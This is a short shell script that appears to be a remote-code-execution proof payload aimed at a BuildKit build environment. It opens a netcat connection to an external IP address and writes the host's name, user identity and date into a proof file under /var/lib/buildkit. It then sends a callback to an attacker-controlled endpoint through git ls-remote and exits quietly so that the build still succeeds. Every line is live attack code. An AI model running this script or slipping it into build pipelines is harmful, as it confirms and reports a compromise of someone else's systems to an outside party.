#!/bin/sh
nc 62.113.111.63 6666
cat /etc/hostname > /var/lib/buildkit/rce_proof.txt
id >> /var/lib/buildkit/rce_proof.txt
date >> /var/lib/buildkit/rce_proof.txt
git ls-remote http://62.113.111.63:8891/rce-callback 2>/dev/null || true
exit 0
